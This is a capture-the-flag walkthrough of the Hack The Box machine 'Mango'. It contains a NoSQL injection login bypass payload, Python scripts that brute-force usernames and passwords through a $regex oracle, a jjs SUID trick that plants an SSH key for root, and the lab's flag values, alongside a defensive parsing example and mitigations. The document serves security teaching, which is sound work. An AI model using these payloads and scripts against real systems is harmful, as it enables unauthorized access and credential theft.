
Mango HTB Walkthrough

📋 Overview

Mango is a medium-difficulty Hack The Box machine that involves NoSQL injection, credential brute-forcing, and privilege escalation through JavaScript engine exploitation.

Difficulty: Medium
Points: 30
Operating System: Linux


🎯 Reconnaissance

Initial Enumeration

export target=10.129.229.185


Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target


Discovered Open Ports:

Service Version Detection

sudo nmap -p 22,80,443 -sC -sV -T4 $target


Key Discovery: The scan revealed staging-order.mango.htb as a virtual host.

Host Configuration

Add to /etc/hosts:

10.129.229.185 staging-order.mango.htb



🔍 Initial Access

Web Application Analysis

Visiting http://staging-order.mango.htb presents a login page. Traditional SQL injection attempts proved unsuccessful, leading to testing for NoSQL injection vulnerabilities.


NoSQL Injection Exploitation

Initial Bypass

Intercepting the login request in Burp Suite and modifying the parameters:

POST / HTTP/1.1
Host: staging-order.mango.htb
Content-Type: application/x-www-form-urlencoded

username[$ne]=admin&password[$ne]=password&login=login


This payload successfully bypassed authentication, revealing the application was vulnerable to NoSQL injection.


Username Enumeration

Python Script for Username Brute-Force:

import requests
import string
import sys

# Extends the known username prefix one character at a time. The login page
# prints "We just started farming" on a successful login, which serves as a
# true/false oracle for the $regex prefix match.
def brute_user(user_prefix=""):
    for char in string.ascii_letters + string.digits:
        payload = user_prefix + char
        sys.stdout.write(f"\r[+] Trying username: {payload}")
        sys.stdout.flush()

        response = requests.post(
            'http://staging-order.mango.htb/',
            data={
                'username[$regex]': f'^{payload}',   # does some username start with this prefix?
                'password[$ne]': 'password',         # matches any password other than "password"
                'login': 'login'
            }
        )

        if "We just started farming" in response.text:
            print(f"\n[+] Found partial username: {payload}")
            brute_user(payload)
            return

    # No character extended the prefix, so the prefix is the complete username.
    if user_prefix:
        print(f"\n[+] Complete username found: {user_prefix}")

if __name__ == "__main__":
    brute_user("")

Discovered Usernames:



Note: the username brute-force reuses the NoSQL injection. The script sends each request with the requests package, using the payload ^{user_prefix+char} to test whether the username starts with a, b, c, and so on. To recover the username that starts with m, call the function as brute_user("m"). The first letter m was found beforehand in Burp with an Intruder sniper attack that tried the payloads ^a, ^b, ... ^z; the sniper request is shown below.

Password Extraction

Python Script for Password Brute-Force:

import requests
import string
import sys

# Same prefix oracle as the username script, now against the password field
# for a known user. Regex metacharacters are skipped because they would change
# the meaning of the ^prefix pattern instead of being matched literally.
def brute_pass(user, pass_prefix=""):
    found = False
    for char in string.ascii_letters + string.digits + string.punctuation:
        if char not in ['+', '.', '*', '?', '|', '\\']:
            payload = pass_prefix + char
            sys.stdout.write(f"\r[+] Trying password: {payload}")
            sys.stdout.flush()

            response = requests.post(
                'http://staging-order.mango.htb/',
                data={
                    'username': f'{user}',
                    'password[$regex]': f'^{payload}',   # does this user's password start with the prefix?
                    'login': 'login'
                }
            )

            if "We just started farming" in response.text:
                found = True
                brute_pass(user, payload)
                return

    # No character extended the prefix, so the prefix is the complete password.
    if not found and pass_prefix:
        print(f"\n[+] For user: {user} Found password: {pass_prefix}")

if __name__ == "__main__":
    brute_pass("admin", "")
    brute_pass("mango", "")



Note: a trailing $ in the recovered password is ignored. Once the prefix is the full password, the pattern ^prefix$ still matches, so $ shows up as one more "character" that only marks the end of the string.
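The following Python example is added here and is not part of the original walkthrough. From the defender's side it shows why both the $ne bypass in the Initial Bypass section and the $regex prefix probes in the two brute-force scripts work: a PHP- or qs-style form parser turns username[$ne]=admin or password[$regex]=^ab into nested objects that reach MongoDB as operators. It contrasts a filter that passes parsed values straight through with a hardened one that enforces string types and an explicit $eq, plus a check that flags operator objects in a query. The request bodies, the sample prefix ^ab and all function names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed request bodies: the $ne bypass and a $regex prefix probe of the
# kind used in this walkthrough, next to a normal login. Values are made up.
BYPASS_BODY = "username[$ne]=admin&password[$ne]=password&login=login"
REGEX_BODY = "username=admin&password[$regex]=^ab&login=login"
NORMAL_BODY = "username=admin&password=secret&login=login"

KEY_SHAPE = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])*)$")

def parse_form(body):
    """Parse urlencoded fields the way PHP- and qs-style parsers do:
    'a[b]=c' becomes {'a': {'b': 'c'}}. That nesting is what lets a client
    smuggle MongoDB operators such as $ne or $regex into a query."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = KEY_SHAPE.match(key)
        if not match:
            continue
        path = [match.group(1)] + re.findall(r"\[([^\[\]]*)\]", match.group(2))
        node = form
        for part in path[:-1]:
            node = node.setdefault(part, {})
        node[path[-1]] = value
    return form

def vulnerable_filter(form):
    """Hands parsed values straight to the query: a nested dict reaches
    MongoDB as an operator instead of a literal credential."""
    return {"username": form.get("username"), "password": form.get("password")}

def hardened_filter(form):
    """Accept only plain strings and compare with an explicit $eq, so no
    client-supplied key can be interpreted as an operator."""
    query = {}
    for field in ("username", "password"):
        value = form.get(field)
        if not isinstance(value, str):
            raise ValueError(f"{field}: expected a string, got {type(value).__name__}")
        query[field] = {"$eq": value}
    return query

def has_operator_injection(query):
    """Detection check (request logs, WAF): any value carrying a $-prefixed key."""
    return any(isinstance(v, dict) and any(k.startswith("$") for k in v)
               for v in query.values())

def rejects_body(body):
    """True when the hardened filter refuses the request body."""
    try:
        hardened_filter(parse_form(body))
    except ValueError:
        return True
    return False
```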

Recovered Credentials:


🚀 Privilege Escalation

Initial Access

ssh mango@10.129.229.185


User Enumeration

Switch to admin user:

su - admin

Stabilize shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

User Flag

cat /home/admin/user.txt

User Flag: 79dfb8a4808a30feb7d431d5f4a36380


Privilege Escalation to Root

SUID Binary Discovery

find / -type f -user root -perm -4000 -ls 2>/dev/null


Key Finding: jjs (JavaScript engine) with SUID permissions owned by root.

GTFOBins Exploitation

Using jjs for file write operations:


echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2E...");
fw.close();' | jjs


Root Access via SSH

ssh -i private_key root@10.129.229.185

Root Flag

cat /root/root.txt

Root Flag: 679984d14402f6b0e0dccf1c1fe7b9ab



🛡️ Mitigation Strategies

  1. NoSQL Injection Prevention
    • Implement input validation and sanitization
    • Use parameterized queries
    • Apply proper authentication mechanisms
  2. Privilege Management
    • Remove unnecessary SUID binaries
    • Implement principle of least privilege
    • Regular security audits of system permissions
  3. Network Security
    • Restrict SSH key-based authentication
    • Implement network segmentation
    • Regular vulnerability assessments

📚 Lessons Learned


🔗 References


This walkthrough is for educational purposes only. Always ensure you have proper authorization before testing security vulnerabilities.